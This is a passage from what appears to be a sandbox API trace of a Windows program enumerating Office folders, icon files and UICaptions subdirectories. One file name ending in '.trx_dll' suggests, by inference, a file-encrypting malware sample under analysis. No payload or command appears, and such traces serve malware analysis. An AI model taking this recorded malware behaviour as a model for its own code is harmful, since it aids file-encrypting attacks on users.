Users\\Microsoft\\OFFICE\\DocumentRepository.ico", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico", lpFilePart=0x0) returned 0x3a [0253.184] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico", lpFilePart=0x0) returned 0x3a [0253.184] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico", lpFilePart=0x0) returned 0x3a [0253.184] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico", lpFilePart=0x0) returned 0x3a [0253.184] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico", lpFilePart=0x0) returned 0x3a [0253.184] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico", lpFilePart=0x0) returned 0x3a [0253.185] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico", lpFilePart=0x0) returned 0x3a [0253.185] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico", lpFilePart=0x0) returned 0x3a [0253.185] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico", lpFilePart=0x0) returned 0x3a [0253.185] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0253.185] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico" (normalized: "c:\\users\\all users\\microsoft\\office\\documentrepository.ico"), fInfoLevelId=0x0, lpFileInformation=0x26e340 | out: lpFileInformation=0x26e340*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabeeea00, ftCreationTime.dwHighDateTime=0x1c63848, ftLastAccessTime.dwLowDateTime=0x51e19d30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xabeeea00, ftLastWriteTime.dwHighDateTime=0x1c63848, nFileSizeHigh=0x0, nFileSizeLow=0x627e)) returned 1 [0253.187] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0253.187] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0253.187] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico" (normalized: "c:\\users\\all users\\microsoft\\office\\documentrepository.ico"), fInfoLevelId=0x0, lpFileInformation=0x6cd74b0 | out: lpFileInformation=0x6cd74b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabeeea00, ftCreationTime.dwHighDateTime=0x1c63848, ftLastAccessTime.dwLowDateTime=0x51e19d30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xabeeea00, ftLastWriteTime.dwHighDateTime=0x1c63848, nFileSizeHigh=0x0, nFileSizeLow=0x627e)) returned 1 [0253.187] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0253.187] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico", lpFilePart=0x0) returned 0x3a [0253.187] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico", lpFilePart=0x0) returned 0x3a [0253.187] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0253.187] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico" (normalized: "c:\\users\\all users\\microsoft\\office\\documentrepository.ico"), fInfoLevelId=0x0, lpFileInformation=0x26e340 | out: lpFileInformation=0x26e340*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabeeea00, ftCreationTime.dwHighDateTime=0x1c63848, ftLastAccessTime.dwLowDateTime=0x51e19d30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xabeeea00, ftLastWriteTime.dwHighDateTime=0x1c63848, nFileSizeHigh=0x0, nFileSizeLow=0x627e)) returned 1 [0253.187] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0253.187] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\DocumentRepository.ico", lpFilePart=0x0) returned 0x3a [0253.189] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0253.189] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\MySharePoints.ico" (normalized: "c:\\users\\all users\\microsoft\\office\\mysharepoints.ico"), fInfoLevelId=0x0, lpFileInformation=0x26e340 | out: lpFileInformation=0x26e340*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2bfbd800, ftCreationTime.dwHighDateTime=0x1c9facb, ftLastAccessTime.dwLowDateTime=0x6a3248d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2bfbd800, ftLastWriteTime.dwHighDateTime=0x1c9facb, nFileSizeHigh=0x0, nFileSizeLow=0x5532e)) returned 1 [0253.190] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0253.190] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0253.190] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\MySharePoints.ico" (normalized: "c:\\users\\all users\\microsoft\\office\\mysharepoints.ico"), fInfoLevelId=0x0, lpFileInformation=0x6cda688 | out: lpFileInformation=0x6cda688*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2bfbd800, ftCreationTime.dwHighDateTime=0x1c9facb, ftLastAccessTime.dwLowDateTime=0x6a3248d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2bfbd800, ftLastWriteTime.dwHighDateTime=0x1c9facb, nFileSizeHigh=0x0, nFileSizeLow=0x5532e)) returned 1 [0253.190] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0253.190] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\MySharePoints.ico", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\MySharePoints.ico", lpFilePart=0x0) returned 0x35 [0253.190] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\MySharePoints.ico", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\MySharePoints.ico", lpFilePart=0x0) returned 0x35 [0253.190] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0253.190] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\MySharePoints.ico" (normalized: "c:\\users\\all users\\microsoft\\office\\mysharepoints.ico"), fInfoLevelId=0x0, lpFileInformation=0x26e340 | out: lpFileInformation=0x26e340*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2bfbd800, ftCreationTime.dwHighDateTime=0x1c9facb, ftLastAccessTime.dwLowDateTime=0x6a3248d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2bfbd800, ftLastWriteTime.dwHighDateTime=0x1c9facb, nFileSizeHigh=0x0, nFileSizeLow=0x5532e)) returned 1 [0253.190] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0253.190] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\MySharePoints.ico", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\MySharePoints.ico", lpFilePart=0x0) returned 0x35 [0253.191] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0253.191] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\MySite.ico" (normalized: "c:\\users\\all users\\microsoft\\office\\mysite.ico"), fInfoLevelId=0x0, lpFileInformation=0x26e340 | out: lpFileInformation=0x26e340*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc92d1d00, ftCreationTime.dwHighDateTime=0x1c627a2, ftLastAccessTime.dwLowDateTime=0x594ac510, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc92d1d00, ftLastWriteTime.dwHighDateTime=0x1c627a2, nFileSizeHigh=0x0, nFileSizeLow=0x627e)) returned 1 [0253.192] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0253.192] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0253.192] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\MySite.ico" (normalized: "c:\\users\\all users\\microsoft\\office\\mysite.ico"), fInfoLevelId=0x0, lpFileInformation=0x6cdd6a4 | out: lpFileInformation=0x6cdd6a4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc92d1d00, ftCreationTime.dwHighDateTime=0x1c627a2, ftLastAccessTime.dwLowDateTime=0x594ac510, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc92d1d00, ftLastWriteTime.dwHighDateTime=0x1c627a2, nFileSizeHigh=0x0, nFileSizeLow=0x627e)) returned 1 [0253.192] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0253.192] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\MySite.ico", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\MySite.ico", lpFilePart=0x0) returned 0x2e [0253.192] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\MySite.ico", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\MySite.ico", lpFilePart=0x0) returned 0x2e [0253.192] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0253.192] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\MySite.ico" (normalized: "c:\\users\\all users\\microsoft\\office\\mysite.ico"), fInfoLevelId=0x0, lpFileInformation=0x26e340 | out: lpFileInformation=0x26e340*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc92d1d00, ftCreationTime.dwHighDateTime=0x1c627a2, ftLastAccessTime.dwLowDateTime=0x594ac510, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc92d1d00, ftLastWriteTime.dwHighDateTime=0x1c627a2, nFileSizeHigh=0x0, nFileSizeLow=0x627e)) returned 1 [0253.192] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0253.192] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\MySite.ico", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\MySite.ico", lpFilePart=0x0) returned 0x2e [0253.193] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0253.193] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\SharePointPortalSite.ico" (normalized: "c:\\users\\all users\\microsoft\\office\\sharepointportalsite.ico"), fInfoLevelId=0x0, lpFileInformation=0x26e340 | out: lpFileInformation=0x26e340*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf2444900, ftCreationTime.dwHighDateTime=0x1c63848, ftLastAccessTime.dwLowDateTime=0x5ab49610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf2444900, ftLastWriteTime.dwHighDateTime=0x1c63848, nFileSizeHigh=0x0, nFileSizeLow=0x627e)) returned 1 [0253.194] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0253.194] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0253.194] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\SharePointPortalSite.ico" (normalized: "c:\\users\\all users\\microsoft\\office\\sharepointportalsite.ico"), fInfoLevelId=0x0, lpFileInformation=0x6ce0504 | out: lpFileInformation=0x6ce0504*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf2444900, ftCreationTime.dwHighDateTime=0x1c63848, ftLastAccessTime.dwLowDateTime=0x5ab49610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf2444900, ftLastWriteTime.dwHighDateTime=0x1c63848, nFileSizeHigh=0x0, nFileSizeLow=0x627e)) returned 1 [0253.194] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0253.194] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\SharePointPortalSite.ico", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\SharePointPortalSite.ico", lpFilePart=0x0) returned 0x3c [0253.194] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\SharePointPortalSite.ico", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\SharePointPortalSite.ico", lpFilePart=0x0) returned 0x3c [0253.194] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0253.194] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\SharePointPortalSite.ico" (normalized: "c:\\users\\all users\\microsoft\\office\\sharepointportalsite.ico"), fInfoLevelId=0x0, lpFileInformation=0x26e340 | out: lpFileInformation=0x26e340*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf2444900, ftCreationTime.dwHighDateTime=0x1c63848, ftLastAccessTime.dwLowDateTime=0x5ab49610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf2444900, ftLastWriteTime.dwHighDateTime=0x1c63848, nFileSizeHigh=0x0, nFileSizeLow=0x627e)) returned 1 [0253.195] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0253.195] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\SharePointPortalSite.ico", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\SharePointPortalSite.ico", lpFilePart=0x0) returned 0x3c [0253.195] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0253.195] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\SharePointTeamSite.ico" (normalized: "c:\\users\\all users\\microsoft\\office\\sharepointteamsite.ico"), fInfoLevelId=0x0, lpFileInformation=0x26e340 | out: lpFileInformation=0x26e340*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xad743900, ftCreationTime.dwHighDateTime=0x1c62706, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xad743900, ftLastWriteTime.dwHighDateTime=0x1c62706, nFileSizeHigh=0x0, nFileSizeLow=0x627e)) returned 1 [0253.196] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0253.196] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0253.196] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\SharePointTeamSite.ico" (normalized: "c:\\users\\all users\\microsoft\\office\\sharepointteamsite.ico"), fInfoLevelId=0x0, lpFileInformation=0x6ce3770 | out: lpFileInformation=0x6ce3770*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xad743900, ftCreationTime.dwHighDateTime=0x1c62706, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xad743900, ftLastWriteTime.dwHighDateTime=0x1c62706, nFileSizeHigh=0x0, nFileSizeLow=0x627e)) returned 1 [0253.196] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0253.196] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\SharePointTeamSite.ico", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\SharePointTeamSite.ico", lpFilePart=0x0) returned 0x3a [0253.196] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\SharePointTeamSite.ico", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\SharePointTeamSite.ico", lpFilePart=0x0) returned 0x3a [0253.196] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0253.196] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\SharePointTeamSite.ico" (normalized: "c:\\users\\all users\\microsoft\\office\\sharepointteamsite.ico"), fInfoLevelId=0x0, lpFileInformation=0x26e340 | out: lpFileInformation=0x26e340*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xad743900, ftCreationTime.dwHighDateTime=0x1c62706, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xad743900, ftLastWriteTime.dwHighDateTime=0x1c62706, nFileSizeHigh=0x0, nFileSizeLow=0x627e)) returned 1 [0253.197] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0253.197] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\SharePointTeamSite.ico", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\SharePointTeamSite.ico", lpFilePart=0x0) returned 0x3a [0253.197] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0253.197] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions", nBufferLength=0x105, lpBuffer=0x26de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions", lpFilePart=0x0) returned 0x2e [0253.197] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\", nBufferLength=0x105, lpBuffer=0x26de14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\", lpFilePart=0x0) returned 0x2f [0253.198] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0253.198] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef116910, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1036", cAlternateFileName="")) returned 1 [0253.199] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef116910, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3082", cAlternateFileName="")) returned 1 [0253.199] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0253.199] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0253.199] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0253.199] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0253.199] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0253.199] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions", nBufferLength=0x105, lpBuffer=0x26de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions", lpFilePart=0x0) returned 0x2e [0253.199] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\", nBufferLength=0x105, lpBuffer=0x26de14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\", lpFilePart=0x0) returned 0x2f [0253.199] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0253.200] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef116910, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1036", cAlternateFileName="")) returned 1 [0253.200] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef116910, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3082", cAlternateFileName="")) returned 1 [0253.200] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef116910, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3082", cAlternateFileName="")) returned 0 [0253.200] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0253.200] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0253.200] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0253.200] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0253.200] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082", nBufferLength=0x105, lpBuffer=0x26de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082", lpFilePart=0x0) returned 0x33 [0253.200] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", nBufferLength=0x105, lpBuffer=0x26de14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpFilePart=0x0) returned 0x34 [0253.202] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef116910, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0253.204] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x302da400, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x302da400, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0x3760, dwReserved0=0x0, dwReserved1=0x0, cFileName="ENVELOPR.DLL.trx_dll", cAlternateFileName="ENVELO~1.TRX")) returned 1 [0253.204] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | 